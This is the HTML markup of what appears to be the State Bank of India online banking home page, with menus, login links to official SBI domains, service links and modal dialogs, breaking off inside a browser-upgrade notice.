
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=6.0">
		<meta name="description" content="State Bank of India">
		<meta name="keywords" content="banking, netbanking, online banking, personal banking, corporate banking">
		<!-- <meta name="apple-mobile-web-app-capable" content="yes"> -->
		<meta name="MobileOptimized" content="320">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		
		<title>State Bank of India</title>
		
		<link type="text/css" rel="stylesheet" href="sbijava/css/bootstrap-5.3.3.min.css">
		<link type="text/css" rel="stylesheet" href="sbijava/css/bootstrap-select.css">
		
		<!-- SmartMenus jQuery Bootstrap 4 Addon CSS -->
		<link href="sbijava/css/jquery.smartmenus.bootstrap-4.css" rel="stylesheet">
		<link type="text/css" rel="stylesheet" href="sbijava/css/generic_style.css?v=3">
		
		<script type="text/javascript" src="sbijava/js/jquery-3.7.1.min.js"></script>
		<script type="text/javascript" src="sbijava/js/bootstrap.bundle-5.3.3.min.js"></script>
		<script type="text/javascript" src="sbijava/js/generic_common.js?v=3"></script>
	</head>

	<body>
		<div class="container-xxxl container-fluid">
			<div id="wrapper">
				<!-- Header Starts -->
				<!--<header class="d-flex px-3 align-items-center justify-content-between">
					<a href="https://bank.sbi/" title="Logo" id="logo" rel="external" aria-label="SBI Logo">&nbsp;</a>
					<a href="#mainContent">Skip to main content</a>
					<div id="osbi_logo" class="d-none d-md-flex pe-none user-select-none">&nbsp;</div>
				</header>-->
				
				<header class="d-flex px-3 align-items-center justify-content-between">
					<div class="flex-grow-1"><a href="https://bank.sbi/" title="Logo" id="logo" rel="external" aria-label="SBI Logo">&nbsp;</a></div>
					<div class="px-4"><a href="#mainContent">Skip to main content</a></div>
					<div id="osbi_logo" class="d-none d-md-flex pe-none user-select-none">&nbsp;</div>
				</header>
				<!-- Header Ends -->
				
				<!-- Navigation Starts -->
			<nav id="navigation"
				class="navbar navbar-expand-lg mobile-default  py-2 py-lg-1 d-flex justify-content-end">
				<button class="navbar-toggler btn-menu me-3" type="button" data-bs-toggle="collapse"
					data-bs-target="#navbarNavDropdown" aria-controls="navbarSupportedContent" aria-expanded="false"
					aria-label="Toggle navigation">
					<span class="navbar-toggler-icon"></span>
				</button>

				<div class="collapse navbar-collapse navbar-default px-0 px-lg-2 justify-content-between"
					id="navbarNavDropdown">

					<!-- Left nav -->
					<ul class="nav navbar-nav mr-auto">
						<li class="nav-item dropdown"><a class="nav-link dropdown-toggle"
								href="javascript:void(0)">Services</a>
							<ul class="dropdown-menu">
								<li><a class="dropdown-item" href="https://retail.onlinesbi.sbi/npersonal/sbi_home.html"
										aria-label="Personal Internet Banking">Personal Internet Banking</a></li>
								<li><a class="dropdown-item"
										href="https://corp.onlinesbi.sbi/corporate/sbi/sbi_home.html"
										aria-label="Corporate Internet Banking">Corporate Internet Banking</a></li>

								<li class="dropdown"><a class="dropdown-item dropdown-toggle" href="javascript:void(0)"
										aria-label="Mobile Banking">Mobile Banking</a>
									<ul class="dropdown-menu">
										<li><a class="dropdown-item" href="https://mobilityretail.sbi/sbf_retail.html"
												target="_blank" rel="noopener noreferrer" aria-label="yono LITE">yono
												LITE</a></li>
										<li><a href="https://mobilityretail.sbi/sbf_corporate.html" target="_blank"
												rel="noopener noreferrer" class="dropdown-item void_border"
												aria-label="yono BUSINESS">yono BUSINESS</a></li>


									</ul>
								</li>
								<li><a class="dropdown-item" href="https://www.sbipayments.com/" target="_blank"
										aria-label="SBI Payments">SBI Payments</a></li>
								<li><a class="dropdown-item"
										href="https://retail.onlinesbi.sbi/npersonal/tax_retail.html" target="_blank"
										rel="noopener noreferrer" class="void_border"
										aria-label="Online Tax / Payment / Receipt / Challan printing">Online
										Tax /
										Payment / Receipt / Challan printing</a></li>
							</ul>
						</li>
						<li class="nav-item dropdown"><a class="nav-link dropdown-toggle" href="javascript:void(0)"
								aria-label="FAQ">FAQ</a>
							<ul class="dropdown-menu">
								<li><a class="dropdown-item" href="https://retail.onlinesbi.sbi/npersonal/faq.html"
										aria-label="Personal Banking FAQ">Personal Banking FAQ</a>
								</li>
								<li><a class="dropdown-item"
										href="https://corp.onlinesbi.sbi/corporate/sbi/corp_faq.html"
										aria-label="Corporate Banking FAQ">Corporate Banking FAQ</a></li>


								<li><a class="dropdown-item"
										href="https://mobilityretail.sbi/sbustaticweb/mobile/faq.html"
										aria-label="Yono LITE FAQ">Yono LITE FAQ</a></li>
								<li><a class="dropdown-item"
										href="https://mobilityretail.sbi/sbijava/mobile/sbsecure_otp_app_faq.html"
										class="void_border" aria-label="State Bank Secure OTP App">State Bank Secure
										OTP App</a></li>
							</ul>
						</li>
						<li class="nav-item">
							<a href="https://bank.sbi/" aria-label="Corporate Website" class="nav-link">Corporate
								Website</a>
						</li>
						<li class="nav-item dropdown"><a class="nav-link dropdown-toggle" href="javascript:void(0)"
								aria-label="SBIePay Lite">SBIePay Lite&nbsp;<span
									style="display:inline; height:auto !important; font-size:8px;">(SBMOPS)</span></a>
							<ul class="dropdown-menu">
								<li><a class="dropdown-item"
										href="https://merchant.onlinesbi.sbi/mopsprelogin/mopsremittanceform.htm"
										target="_blank" rel="noopener noreferrer"
										aria-label="SBIePay Lite (formerly SBMOPS) Branch Challan(CP)/Reprint Remittance Form">SBIePay
										Lite (formerly SBMOPS) Branch Challan(CP)/Reprint Remittance Form</a></li>
								<li><a class="dropdown-item"
										href="https://merchant.onlinesbi.sbi/mopsprelogin/mopsBilldeskCancelTransaction.htm"
										target="_blank" rel="noopener noreferrer"
										aria-label="SBIePay Lite (formerly SBMOPS) For Cancel RTGS/NEFT/BRANCH Transactions (CP)">SBIePay
										Lite (formerly SBMOPS) For Cancel RTGS/NEFT/BRANCH Transactions (CP)</a></li>


								<li><a class="dropdown-item"
										href="https://merchant.onlinesbi.sbi/mopsprelogin/mopsRtgsNeftChallanDownload.htm"
										target="_blank" rel="noopener noreferrer"
										aria-label="SBIePay Lite (formerly SBMOPS) RTGS-NEFT PAP Challan Reprint Form (CP)">SBIePay
										Lite (formerly SBMOPS) RTGS-NEFT PAP Challan Reprint Form (CP)</a></li>
								<li><a class="dropdown-item"
										href="https://retail.onlinesbi.sbi/npersonal/tax_retail.html" target="_blank"
										rel="noopener noreferrer" class="void_border"
										aria-label="Online Tax / Payment / Receipt / Challan printing">Online Tax /
										Payment / Receipt / Challan printing</a></li>
							</ul>
						</li>
						<li class="nav-item">
							<a href="https://bank.sbi/web/personal-banking/donations" target="_blank"
								rel="noopener noreferrer" aria-label="Donations" class="nav-link">Donations</a>
						</li>
						<li class="nav-item">
							<a href="https://www.onlinesbi.sbi/sbicollect/icollecthome.htm" aria-label="SB Collect"
								class="nav-link">SB Collect</a>
						</li>
						<li class="nav-item">
							<a href="javascript:void(0)" data-bs-toggle="modal" data-bs-target="#videoListModal"
								id="video_tab" aria-labelledby="videoListModal" class="nav-link">Videos</a>
						</li>
						<li class="nav-item">
							<a href="https://retail.onlinesbi.sbi/retail/mcashclaimwin.htm" aria-label="mCash"
								class="nav-link">mCash</a>
						</li>
						<li class="nav-item dropdown"><a class="nav-link dropdown-toggle" href="javascript:void(0)"
								aria-label="Apply for SB/ Current Account"><span>Apply for SB/ Current Account <sup
										class="new_blink2">New</sup></span></a>
							<ul id="mew" class="dropdown-menu">
								<li class="dropdown"><a class="dropdown-item dropdown-toggle" href="javascript:void(0)"
										aria-label="Savings Bank Account">Savings Bank Account <sup
											class="new_blink">New</sup></a>

									<ul class="dropdown-menu">
										<li><a class="dropdown-item"
												href="https://retail.onlinesbi.sbi/vkyc/vkyclanding.htm" target="_blank"
												rel="noopener noreferrer"
												aria-label="Open Insta Plus Savings Account (Video KYC)"><span>Open
													Insta Plus Savings Account <br>(Video KYC) <sup
														class="new_blink">New</sup></a></li>
										<li><a href="https://oaa.onlinesbi.sbi/oaonri/onlineaccapp.htm"
												class="dropdown-item void_border" aria-label="for NRE/NRO">for
												NRE/NRO</a></li>


									</ul>

								</li>
								<li class="dropdown"><a class="dropdown-item dropdown-toggle" href="javascript:void(0)"
										aria-label="Current Account">Current Account</a>

									<ul class="dropdown-menu">
										<li><a class="dropdown-item"
												href="https://corp.onlinesbi.sbi/oaorevamp/oaolanding.htm"
												aria-label="Current Account"><span>Current Account</a></li>
										<li><a class="dropdown-item"
												href="https://corp.onlinesbi.sbi/vkyccao/vkycoaolanding.htm"
												aria-label="Current Account through VKYC">Current Account through
												VKYC </a></li>
										<li><a href="https://corp.onlinesbi.sbi/mcaoao/mcaaccopening.htm"
												class="void_border dropdown-item" aria-label="MCA Current Account">MCA
												Current Account</a></li>

									</ul>

								</li>

								<li><a href="https://retail.onlinesbi.sbi/npersonal/reg_forms.html" target="_blank"
										rel="noopener noreferrer" class="void_border dropdown-item"
										aria-label="Banking Forms">Banking Forms</a></li>


							</ul>
						</li>
						<li class="nav-item">
							<a href="https://customer.sbiunipay.sbi/CustomerPortal/quickPay" target="_blank" rel="noopener noreferrer" aria-label="SBI Unipay" class="nav-link">SBI Unipay</a>
						</li>
						<li class="nav-item dropdown"><a class="nav-link dropdown-toggle" href="javascript:void(0)"
								aria-label="SBI Loans">SBI Loans <sup class="new_blink2">New</sup></a>
							<ul class="dropdown-menu">
								<li><a class="dropdown-item" href="https://retail.onlinesbi.sbi/lamf/mflanding.htm"
										target="_blank" rel="noopener noreferrer"
										aria-label="Loan Against Mutual Fund">Loan Against Mutual Fund <sup
											class="new_blink">New</sup></a></li>
								<li><a class="dropdown-item"
										href="https://merchant.onlinesbi.sbi/npcimandatecug/emandateloanregistration.htm"
										target="_blank" rel="noopener noreferrer" aria-label="E - Mandate">E -
										Mandate</a></li>


								<li><a class="dropdown-item" href="https://homeloans.sbi/" target="_blank"
										rel="noopener noreferrer" aria-label="Home Loan">Home Loan</a></li>
								<li><a class="dropdown-item" href="https://emudra.bank.sbi:8044/emudra" target="_blank"
										rel="noopener noreferrer" aria-label="e-MUDRA">e-MUDRA</a></li>
								<li><a class="dropdown-item"
										href="https://bank.sbi/web/personal-banking/loans/gold-loan" target="_blank"
										rel="noopener noreferrer" aria-label="Gold Loan">Gold Loan</a></li>
								<li><a class="dropdown-item"
										href="https://bank.sbi/web/personal-banking/loans/auto-loans" target="_blank"
										rel="noopener noreferrer" aria-label="Vehicle Loan">Vehicle Loan</a></li>
								<li><a class="dropdown-item"
										href="https://onlineapply.sbi.co.in/personal-banking/personal-loan"
										target="_blank" rel="noopener noreferrer" aria-label="Xpress Credit">Xpress
										Credit</a>
								</li>
								<li><a class="dropdown-item"
										href="https://onlineapply.sbi.co.in/personal-banking/pension-loan"
										target="_blank" rel="noopener noreferrer" aria-label="Pension Loan">Pension
										Loan</a>
								</li>
								<li><a class="dropdown-item"
										href="https://corp.onlinesbi.sbi/retfinavailod/hulretailerinitial.htm"
										class="void_border" aria-label="Retailer Finance">Retailer Finance</a>
								</li>
							</ul>
						</li>
					</ul>
					<div id="navLangWrap" class="d-block d-lg-flex py-1">
						<!-- <a id="navLang" class="d-block d-lg-flex py-2 px-3 px-lg-2" href="https://retail.onlinesbi.sbi/hindi/sbi_home.html" aria-label="Hindi">&#2361;&#2367;&#2306;&#2342;&#2368;</a> -->
						<a id="navLang" class="d-block d-lg-flex py-2 px-3 px-lg-2" href="hindi/sbi_home.html"
							aria-label="Change Language to Hindi">&#2361;&#2367;&#2306;&#2342;&#2368;</a>
					</div>
				</div>
			</nav>
			<!-- Navigation Ends -->
				
				<!-- Disclaimer Starts -->
				<div id="disclaimerBox" class="row">
					<div id="browser_cache" class="col-lg-12 col-md-12">
						<div class="cacheText">
							<span class="cache_blink">If slowness is observed during Login Page loading, please refresh the  page for better experience.</span>
							<div style="margin-top:10px;">SBI never asks for confidential information such as PIN and OTP from customers. Any such call can be made only by a fraudster. Please do not share personal info.</div>
						</div>
					</div>
				</div>
				<!-- Disclaimer Ends-->
				
				<!-- Banking Content Starts -->
				<main id="mainContent">
				<div id="bankingBoxes" class="row row-cols-1 row-cols-lg-2 row-cols-md-1 row-cols-sm-1 g-4">
					<div class="col m-0 px-1 p-0">
						<div class="card h-100 border-0">
						<div class="banking_section card-body">
							<span id="personal_icon">&nbsp;</span>
							<h1 style="margin:0px"><a href="https://retail.onlinesbi.sbi/npersonal/sbi_home.html" class="personal" aria-label="Personal Banking">
								<span class="personal_highlight">PERSONAL</span> BANKING
							</a></h1>
							<div class="login loginButton p-2" style="min-height:auto;">
								<a class="login--new d-flex m-0 py-2 ps-4 pe-4 pe-sm-3" href="https://retail.onlinesbi.sbi/retail/login.htm" style="display:inline-block;margin-top:0px;" aria-label="Personal Banking Login">
									<span class="classicTxt px-0">LOGIN</span>
									<span class="classicImg d-none d-sm-block ps-4">
										<img src="sbijava/images/arrow.png" alt="Personal Login" title="Personal Login"/>
									</span>
								</a>
							 </div>
							 
							 <div class="belowLogSec">
								<p>&nbsp;</p>
							 </div>
							 
							<div class="iconLinks py-0">
								<div class="row">
									<div class="iconLink col-12 col-sm-3 py-1 px-2 px-lg-1">
										<a class="register" href="javascript:void(0);" data-bs-toggle="modal" data-bs-target="#newUserModal" aria-labelledby="newUserModal">
											<span class="lbl">New User Registration / Activation</span>
										</a>
									</div>
									<div class="iconLink col-12 col-sm-3 py-1 px-2 px-lg-1">
										<a class="how" href="help_personal.html" target="_blank" rel="noopener noreferrer" aria-label="How do i register retail Internet banking">
											<span class="lbl">How Do I</span>
										</a>
									</div>
									<div class="iconLink col-12 col-sm-3 py-1 px-2 px-lg-1">
										<a class="customer_care" href="https://crcf.bank.sbi/" target="_blank" rel="noopener noreferrer" aria-label="Customer Request and Complaint Form">
											<span class="lbl">Customer Care</span>
										</a>
									</div>
									<div class="iconLink col-12 col-sm-3 py-1 px-2 px-lg-1">
										<a class="unlockUser" href="javascript:void(0)" onclick="window.open('https://retail.onlinesbi.sbi/preretail/lockunlockuseraccess.htm','aboutus','width=780, height=500 ,status=1, scrollbars=1, location=0,resizable=yes')" aria-label="Lock & Unlock User">
											<span class="lbl">Lock &amp; Unlock User</span>
										</a>
									</div>
								</div>
							</div>
							<p class="hidden-xs">SBI's internet banking portal provides personal banking services that gives you complete control over all your banking demands online.</p>
						</div>
					</div>
					</div>
					
					<div class="col m-0 px-1 p-0">
						<div class="card h-100 border-0">
						<div class="banking_section card-body">
							<span class="corp_icon"><img src="sbijava/images/ybbi_corp.png" alt="yono BUSINESS" title="yono BUSINESS"></span>
							<a href="https://yonobusiness.sbi/" class="personal" aria-label="Corporate Banking"><span class="personal_highlight">CORPORATE</span> BANKING</a>
							
							<div class="login d-inline-flex p-2">
								<div class="login-options d-flex">
									  <div class="dropdown bootstrap-select custom-select bs3">
										<button type="button" class="btn dropdown-toggle btn-default py-0 ps-3 pe-3" data-bs-toggle="dropdown" aria-label="Yono business login">
											<div class="filter-option">
												<div class="filter-option-inner">
													<div class="filter-option-inner-inner">
														<span class="dropdown-item-selected">
														</span>
													</div>
												</div>
											</div>
										</button>
										<ul class="dropdown-menu">
											<li>
												<a class="dropdown-item" href="javascript:void(0)" data-value="https://yonobusiness.sbi/login/yonobusinesslogin">
													<span>yono BUSINESS <sup class="new_blink">New</sup></span>
												</a>
											</li>
											<li>
												<a class="dropdown-item" href="javascript:void(0)" data-value="https://corp.onlinesbi.sbi/corpuser/login.htm">Corporate</a>
											</li>
											<li>
												<a class="dropdown-item" href="javascript:void(0)" data-value="https://scf.sbi/vfim/login.htm">Supply Chain Finance</a>
											</li>
										</ul>
									</div>
									<a href="javascript:void(0);" class="corp_login" aria-label="Login" 
									onclick="goToInbPage('.bootstrap-select ul.dropdown-menu li a.dropdown-item.selected', 'Please Select Corporate Type')">LOGIN</a>
								</div>
							</div>
							
							<p style="font-size:13px; margin:0px 15px 5px; text-align:left; line-height:20px;">
								<em>Have you tried our new simplified and intuitive business banking platform? Log in to yonobusiness.sbi to avail business banking services.</em>
							</p>
							
							<div class="iconLinks py-0">
								<div class="row">
									<div class="iconLink col-12 col-sm-4">
										<a class="register" href="https://yonobusiness.sbi/preonboard/landing/registration" target="_blank" rel="noopener noreferrer" aria-label="New Corporate Registration">
											<span class="lbl">New Corporate Registration</span>
										</a>
									</div>
									<div class="iconLink col-12 col-sm-4">
										<a class="how" href="https://corp.onlinesbi.sbi/ybbihelp/help_corporate.html" target="_blank" rel="noopener noreferrer" aria-label="How do I register for yono BUSINESS">
											<span class="lbl">How Do I</span>
										</a>
									</div>
									<div class="iconLink col-12 col-sm-4">
										<a class="customer_care" href="https://yonobusiness.sbi/ContactUs" target="_blank" rel="noopener noreferrer" aria-label="yono Business customer support">
											<span class="lbl">Customer Care</span>
										</a>
									</div>
								</div>
							</div>
							
							<p class="hidden-xs">Corporate Banking application to administer and manage non personal accounts online.</p>
						</div>
					</div>
				</div>
				</div>
				
				<!-- Banking Content Ends -->
				
				<!-- Scroll Message/Marquee Starts -->
				<div id="wpanel_users" class="row">
					<div id="message" class="wpanel_marquee m-0">
						<p></p>
					</div>
				</div>
				<!-- Scroll Message/Marquee Ends -->
				
				<!-- Useful Links -->
				<div id="useful-links" data-btn-collapse=".btnCollapse" data-less-rows-grid-cols="6-xs-1 4-sm-2 5-md-3 4-lg-4 4-xl-4 4-xxl-4">
					<div class="row">
						<div class="col">
							<a href="https://crcf.bank.sbi/ccf/home/UnAuth/" target="_blank" rel="noopener noreferrer" aria-label="Register Complaint of Unauthorized Transaction"><span class="new_blink"><strong>Register Complaint of Unauthorized Transaction</strong></span></a>
						</div>
						<div class="col">
							<a href="https://qms.bank.sbi/" target="_blank" rel="noopener noreferrer" aria-label="Queue Management System">Queue Management System</a>
						</div>
						<div class="col">
							<a href="https://rbiretaildirect.org.in" target="_blank" rel="noopener noreferrer" aria-label="RBI Retail Direct portal">RBI Retail Direct portal</a>
						</div>
						<div class="col">
							<a href="https://retail.onlinesbi.sbi/retail/blockatmcardintermediate.htm" target="_blank" rel="noopener noreferrer" aria-label="Block ATM Card">Block ATM Card</a>
						</div>
						<div class="col">
							<a href="https://retail.onlinesbi.sbi/npersonal/reg_forms.html" target="_blank" rel="noopener noreferrer" aria-label="Banking Forms">Banking Forms</a>
						</div>
						<div class="col">
							<a href="https://www.psballiance.com/doorstep-banking.html" target="_blank" rel="noopener noreferrer" aria-label="Doorstep Banking">Doorstep Banking</a>
						</div>
						<div class="col">
							<a href="https://www.sbigeneral.in/portal/downloads" target="_blank" rel="noopener noreferrer" aria-label="SBI General Insurance Document Download">SBI General Insurance Document Download</a>
						</div>
						<div class="col">
							<a href="https://fastag.bank.sbi" target="_blank" rel="noopener noreferrer" aria-label="SBI FasTag">SBI FasTag</a>
						</div>
						<div class="col">
							<a href="https://bank.sbi/web/salary-account" target="_blank" rel="noopener noreferrer" aria-label="SBI Salary Account">SBI Salary Account</a>
						</div>
						<div class="col">
							<a href="https://bank.sbi/web/nri/home" target="_blank" rel="noopener noreferrer" aria-label="NRI Services">NRI Services</a>
						</div>
						<div class="col">
							<a href="https://cybercrime.gov.in/" target="_blank" rel="noopener noreferrer" aria-label="CYBER CRIME HELPLINE">CYBER CRIME HELPLINE</a>
						</div>
						<div class="col">
							<a href="https://www.sbisecurities.in/" target="_blank" rel="noopener noreferrer" aria-label="SBI Securities">SBI Securities</a>
						</div>
						<div class="col">
							<a href="https://remit.sbi/" target="_blank" rel="noopener noreferrer" aria-label="SBI Express Remit">SBI Express Remit</a>
						</div>
						<div class="col">
							<a href="https://www.sbimf.com/en-us/quick-invest?arn_code=ARN12195" target="_blank" rel="noopener noreferrer" aria-label="SBI Mutual Fund">SBI Mutual Fund</a>
						</div>
						<div class="col">
							<a href="https://www.sbilife.co.in" target="_blank" rel="noopener noreferrer" aria-label="SBI Life Insurance">SBI Life Insurance</a>
						</div>
						<div class="col">
							<a href="http://www.sbicard.com/" target="_blank" rel="noopener noreferrer" aria-label="SBI Card">SBI Card</a>
						</div>
						<div class="col">
							<a href="https://www.onlinesbiglobal.com/" target="_blank" rel="noopener noreferrer" aria-label="OnlineSBI Global">OnlineSBI Global </a>
						</div>
						<div class="col">
							<a href="https://prepaid.sbi/" target="_blank" rel="noopener noreferrer" aria-label="Foreign Travel/EZ-Pay/Gift Cards">Foreign Travel/EZ-Pay/Gift Cards</a>
						</div>
						<div class="col">
							<a href="http://www.sbigeneral.in" target="_blank" rel="noopener noreferrer" aria-label="SBI General Insurance">SBI General Insurance</a>
						</div>
						<div class="col">
							<a href="https://newcmp.sbi" target="_blank" rel="noopener noreferrer" aria-label="Cash Management Product">Cash Management Product</a>
						</div>
						<div class="col">
							<a href="https://rewardz.sbi/" target="_blank" rel="noopener noreferrer" aria-label="State Bank Loyalty Rewardz">State Bank Loyalty Rewardz</a>
						</div>
						<div class="col">
							<a href="https://www.onlinesbi.sbi/documents/GSTN_Transactions_Updation_Process.pdf" target="_blank" rel="noopener noreferrer" aria-label="GSTN Updation">GSTN Updation</a>
						</div>
						<div class="col">
							<a href="https://esbtr.onlinesbi.sbi/ESBTR1/OnlineReg.do?method=fetchDistrictList" target="_blank" rel="noopener noreferrer" aria-label="eSBTR Challan Generation">eSBTR Challan Generation</a>
						</div>
						<div class="col">
							<a href="https://retail.onlinesbi.sbi/sbijava/retail/html/faq_noida_metro.html" target="_blank" rel="noopener noreferrer" aria-label="Noida Metro Card">Noida Metro Card</a>
						</div>
						<div class="col">
							<a href="https://sbicaptrustee.in/mywill/index.jsp" target="_blank" rel="noopener noreferrer" aria-label="SBICAP Trustee Company Ltd My WILL Services Online">SBICAP Trustee Company Ltd My WILL Services Online</a>
						</div>
						<div class="col">
							<a href="https://retail.onlinesbi.sbi/sbijava/retail/html/faq_nagpur_metro.html" target="_blank" rel="noopener noreferrer" aria-label="Nagpur Metro Card">Nagpur Metro Card</a>
						</div>
						<div class="col">
							<a href="https://www.sbiepay.sbi/secure/billpayment/checkout?m=0eb754aa77d0dea8efa1cbccd31c2a4f652e6b138a688d57d86837c685660446&u=0eb754aa77d0dea8efa1cbccd31c2a4f652e6b138a688d57d86837c685660446" target="_blank" rel="noopener noreferrer" aria-label="Loan Repayment via Digital Mode (ePay)">Loan Repayment via Digital Mode (ePay)</a>
						</div>
						<div class="col">
							<a href="https://eportal.incometax.gov.in/iec/foservices/#/pre-login/bl-link-aadhaar" target="_blank" rel="noopener noreferrer" aria-label="Linking of PAN with Aadhaar">Linking of PAN with Aadhaar</a>
						</div>
						<div class="col">
							<a href="https://bank.sbi/web/business/sme/current-accounts" target="_blank" rel="noopener noreferrer" aria-label="Current Account">Current Account</a>
						</div>
						<div class="col">
							<a href="https://bank.sbi/web/personal-banking/misc/bharat-aadhaar-seeding-enabler" target="_blank" rel="noopener noreferrer" aria-label="Aadhaar Seeding Service: BASE">Aadhaar Seeding Service: BASE</a>
						</div>
						<div class="col">
							<a href="https://www.onlinesbi.sbi/documents/Yono_Business_Fair_Practice_Lending_Code.pdf" target="_blank" rel="noopener noreferrer" aria-label="Fair Lending Practice Code">Fair Lending Practice Code</a>
						</div>
					</div>
					
					<div class="btnCollapseWrap text-center py-2">
						<a class="btnCollapse mt-1 mb-3" href="javascript:void(0)"  
						aria-controls="useful-links-more" aria-label="More Useful Links" aria-expanded="false">
							<span class="icon less">&#9652;</span><span class="lbl less">More Useful Links </span>
							<span class="icon more">&#9662;</span><span class="lbl more">More Useful Links </span>
						</a>
					</div>
				</div>
				<!-- Useful Links Ends -->
				
				<!-- Banner Carousel Starts -->
				<div id="sbihome-banner-carousel" class="row">
					<div id="sbihomeBannerCarousel" class="carousel slide">
						<ul class="carousel-indicators"></ul>
						<div class="carousel-inner"></div>
						<button type="button" class="carousel-control carousel-control-prev" data-bs-target="#sbihomeBannerCarousel" data-bs-slide="prev" title="previous" aria-label="Carousel Previous Button">
							<span class="carousel-control-icon carousel-control-prev-icon previous round" aria-hidden="true">&#8249;</span>
						</button>
						<button type="button" class="carousel-control carousel-control-next" data-bs-target="#sbihomeBannerCarousel" data-bs-slide="next" title="next" aria-label="Carousel Next Button">
							<span class="carousel-control-icon carousel-control-next-icon next round" aria-hidden="true">&#8250;</span>
						</button>
					</div>
				</div>
				<!-- Banner Carousel Ends -->
				</main>
				
				<!-- Footer Starts -->
				<footer id="footer" class="row">
					<div class="col-12 col-lg-4 text-center text-lg-start">
						<p class="p-0">&copy; State Bank of India (APM Id:Serv_Tran_564)</p>
					</div>
					
					<!-- Social Icons Starts --> 
					<div class="socialLinks">
						<div class="socialLinksInner">
							<a class="socialLink" title="SBI Official Facebook Page https://www.facebook.com/StateBankofIndiaOfficial" target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/StateBankofIndia" aria-label="SBI Official Facebook Page">
								 <span class="socialLinkIcon" aria-hidden="true" id="icon_linkfb">&nbsp;</span>
								 <span class="socialLinkLabel" aria-label="hidden">SBI Official<br/> Facebook</span>
							</a>
							 
							 <a class="socialLink" title="SBI Official Twitter Link https://twitter.com/TheOfficialSBI" target="_blank" rel="noopener noreferrer"  href="https://twitter.com/TheOfficialSBI" aria-label="SBI Official Twitter Link">
								<span class="socialLinkIcon" id="icon_linktw"></span>
								<span class="socialLinkLabel">SBI Official<br/> Twitter</span>
							</a>
							 
							<a class="socialLink" title="SBI Official YouTube Link http://www.youtube.com/theofficialsbi" target="_blank" rel="noopener noreferrer"  href="http://www.youtube.com/theofficialsbi" aria-label="SBI Official YouTube Link">
								<span class="socialLinkIcon" id="icon_linkyt"></span>
								<span class="socialLinkLabel">SBI Official<br/> YouTube</span>
							</a>
							
							<a class="socialLink" title="SBI Official LinkedIn Link https://www.linkedin.com/company/state-bank-of-india/" target="_blank" rel="noopener noreferrer"  href="https://www.linkedin.com/company/state-bank-of-india/" aria-label="SBI Official LinkedIn Link">
								<span class="socialLinkIcon" id="icon_linklindn"></span>
								<span class="socialLinkLabel">SBI Official<br/> LinkedIn</span>
							</a>
							  
							<a class="socialLink" title="SBI Official instagram Link" target="_blank" rel="noopener noreferrer"  href="https://instagram.com/theofficialsbi/" aria-label="SBI Official instagram Link">
								<span class="socialLinkIcon" id="icon_linkinst"></span>
								<span class="socialLinkLabel">SBI Official<br/> Instagram</span>
							</a>
							  
							<a class="socialLink" title="SBI Official Pinterest Link" target="_blank" rel="noopener noreferrer"  href="https://www.pinterest.com/TheOfficialSBI/" aria-label="SBI Official Pinterest Link">
								<span class="socialLinkIcon" id="icon_linkpint"></span>
								<span class="socialLinkLabel">SBI Official<br/> Pinterest</span>
							</a>
								
							 <a class="socialLink" title="Contact Us" target="_blank" rel="noopener noreferrer"  href="https://retail.onlinesbi.sbi/npersonal/contact_us.html" aria-label="Contact Us">
								<span class="socialLinkIcon" id="icon_contus"></span>
								<span class="socialLinkLabel">Contact Us</span>
							</a>
							
							<a class="socialLink" title="Whatsapp Banking" target="_blank" rel="noopener noreferrer"  href="https://bank.sbi/web/personal-banking/digital/whatsapp-banking" aria-label="Whatsapp Banking">
								<span class="socialLinkIcon" id="icon_whatsapp"></span>
								<span class="socialLinkLabel">Whatsapp Banking</span>
							</a>
						</div>
					</div>
					<!-- Social Icons Ends --> 
					
					<div class="col-12 col-lg-8 text-center text-lg-end">
						<p class="p-0">Site best viewed at 1280 × 720 resolution in Microsoft Edge 100+, Mozilla 100+, Google Chrome 111+</p>
					</div>
				</footer>
				<!-- Footer Ends -->
				
			</div>
			<!-- Wrapper Ends -->
			
		</div>
      
		<section id="modalsGroup">		  
			  <!-- NEW USER Modal -->
			  <div id="newUserModal" class="modal fade" role="dialog" aria-label="New User Registration">
				 <div class="modal-dialog">
					<!-- Modal content-->
					<div class="modal-content">
					   <div class="modal-body">
						  <div class="modal_head">New User Registration</div>
						  <p>If you have already obtained Pre-Printed Kit from the branch for activating INB facility, please don't proceed with this link. You can input userid and password given in PPK on normal login screen.</p>
						  <p>Note: This link is applicable for Retail customers only.</p>
						  <div class="text-center">
							 <a href="javascript:void(0)" class="btn btn-primary" onclick="fnNewUserClick()" data-bs-dismiss="modal" aria-label="OK">OK</a>
							 <a href="javascript:void(0)" class="btn btn-default"  data-bs-dismiss="modal" aria-label="Cancel">Cancel</a>
						  </div>
						  <button type="button" class="close" data-bs-dismiss="modal">&times;</button>
					   </div>
					</div>
				 </div>
			  </div>
			  
			  <!-- Video List Modal -->
			  <div id="videoListModal" tabindex="-1" class="modal fade" role="dialog" aria-label="OnlineSBI VIDEOS">
				 <div class="modal-dialog">
					<!-- Modal content-->
					<div class="modal-content">
					   <div class="modal-body">
						  <div class="modal_head">OnlineSBI VIDEOS</div>
						  <ul class="video_list">
							 <li class="rinb_video">
								<a href="javascript:void(0)">How Do I Videos on Internet Banking</a>
								<ul style="display:none;" id="inb-list">
									 <li>
										<a href="https://retail.onlinesbi.sbi/npersonal/rinb_videos.html" target="_blank" rel="noopener noreferrer" aria-label="Retail Internet Banking">Retail Internet Banking </a>
									</li>
									   <li>
										<a href="https://corp.onlinesbi.sbi/corporate/sbi/cinb_videos.html" target="_blank" rel="noopener noreferrer" aria-label="Corporate Internet Banking">Corporate Internet Banking</a>
									</li>
								</ul>
							 </li>
						  </ul>
						   <button type="button" class="close" data-bs-dismiss="modal">&times;</button>
					   </div>
					</div>
				 </div>
			  </div>
			  			  
			  <!-- Modal -->
			  <div id="oldBrowserModal" class="modal fade" role="dialog" aria-label="Browser version information">
				 <div class="modal-dialog">
					<!-- Modal content-->
					<div class="modal-content">
					   <div class="modal-body">
						  <!--   <button type="button" class="close" data-bs-dismiss="modal">&times;</button> -->
						  <p>You are using an older browser version that may not enable you to perform operations with ease since the content may be misaligned.</p>
						  <p>For a better and safer user experience, please upgrade your browser. You can download the latest browser updates here. Please note that these links will direct you to pages outside the onlinesbi website.</p>
						  <ul class="browsers">
